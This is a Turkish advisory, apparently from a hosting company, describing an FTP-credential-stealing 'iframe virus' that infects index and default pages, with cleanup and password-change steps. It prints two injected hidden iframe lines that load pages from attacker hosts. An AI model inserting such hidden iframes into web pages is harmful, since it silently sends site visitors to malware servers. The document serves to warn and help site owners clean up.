İnternet ortamında gittikçe yaygınlaşan iframe denilen bir virüs sözkonusudur. Bu virüs hostunuza bulaşabilir. Bu virüs bir çok web sahibinin sorunu olmuş durumdadır.

Bu konuda bazı kullanıcılarımızın sitelerine bulaşmış olması nedeniyle hacklendiğini düşünen yada bizim tarafımızdan konulduğu sanılan kod ile ilgili kullanıcılarımızın bilgilendirilmesi için bazı bilgileri derledik.

Virüs hostinge bulaştığında index.asp ,index.php default.asp gibi ana sayfa düzenine yerleştirdiği kodlar sayesinde siteyi yönlendirebilmektedir.aynı zamanda diğer bütün klasörlerin içinde bulunan index.php ,index.html, index.htm, default.asp' dosyalarının içine yerleşiyor. Bu virüs cuteftp, Blazeftp, Filezilla vb bazı programların crack yada keygen programlarından bulaşmakta yada daha evvel bulaşan sitelere girilmesinden dolayı antivirüs programı olmayan bilgisayarlara bulaşmaktadır. Program girdiğiniz bütün FTP'lere girmeye başlar.. Bir çok antivirüs programında henüz tam anlamıyla görüntülenmeyen virüs avast antivirüs programında net olarak tespit edilebilmektedir.

Bu virüs bir kere bilgisayarınıza bulaştıkdan sonra o bilgisayarla hangi sitenin FTP'ini açarsanız açın girdiğiniz FTP bilgilerini kaydederek, sitelere girip index.php , index.html , index.htm , default.asp 'nin içlerine iframe kodu atıyor atılan iframe kodu şu şekildedir..

<--iframe src http://b6l.ru:8080/index.php width 649 height 135 style visibility: hidden>/iframe-->

yada

<--iframe src=http://81.95.145.240/logo/index.php style=border:0px solid gray WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no>

bu adresler değişiklik gösterebilir. Peki virüs sizin bilgisayarınıza bulaştı ve bunun farkına vardınız ne yapmamız gerekir ? Sadece FTP bilgilerinizi alabildiği için hemen dosyalarınızı pc'ye atıp içindeki iframe kodlarını silin ve tekrar FTP'den upload edin. Sonra hiç vakit kaybetmeden kullandığınız cpanel/plesk panelinize girin ve şifrenizi değiştirin.

Bu işlemleri yaptıktan sonra sakın FTP'den giriş yapmayın. Çünkü FTP'den giriş yaptığınızda değiştirdiğiniz şifreyide alarak tekrar dosyalarıza iframe atmaya başlayacaktır.. Bu işlemleride yaptıktan sonra virüs taraması yaparak bilgisayarınızı temizleyin. Virüsün temizlenmediğini düşünüyorsanız bilgisayarınıza format atabilirsiniz..

Herhangi bir web sayfanızdan virüs önce bilgisayarınıza sızıyor ve daha sonra FTP benzeri program ile sitenize bulaşıyor. Haliyle bu şekilde her yere yayılmaya başlıyor. virüs bi süre sonra masaüstünüze update.exe diye bi virüs ekleyip pc'ye zarar vermeye başlıyormuş.

Çözüm için ne yapabiliriz? Öncelikle bilgisayarınızda dosya bulma menüsünden cd Win.Agent.pz(ntos.exe) bulduğunuzda hemen silin. Daha sonra antitrojan ve antivirüsler ile bilgisayarınızı tarayın. Bu işlemlerden sonra FTP'yi kullanıp dosyaları kontrol edin.

Diğer bir alternatif olarak; Sitenizde bulunan dosyaları FTP yoluyla bilgisayarınıza indirip belirtilen iframe kodlarının olup olmadığını kontrol kontrol ederek virüs taramasından geçirin. Güvende olduğunuzu hissediyorsanız Daha sonra dosyaları FTP'den tekrar sitenize atın. Yada Cute FTP kullanıyorsanız Ctrl-F kısayılu ile arama menüsünü açarak sitenizte 81.95.145.240 ip numarasını arayın. İframe virüsünün bulaştığı, yani uyarı veren dosyada yukarıdaki kırmızı olarak yazılmış satırlara benzer kodlar bulunur. Bu kod genelde sayfanın en sonunda olur. Kodu tamamen silip kaydetmeniz yeterli olacaktır.Ama eğer bilgisayarınızda bir antivirüs yoksa (avast yada nod32) bu iki programdan birini yükleyip tarama yaptırın.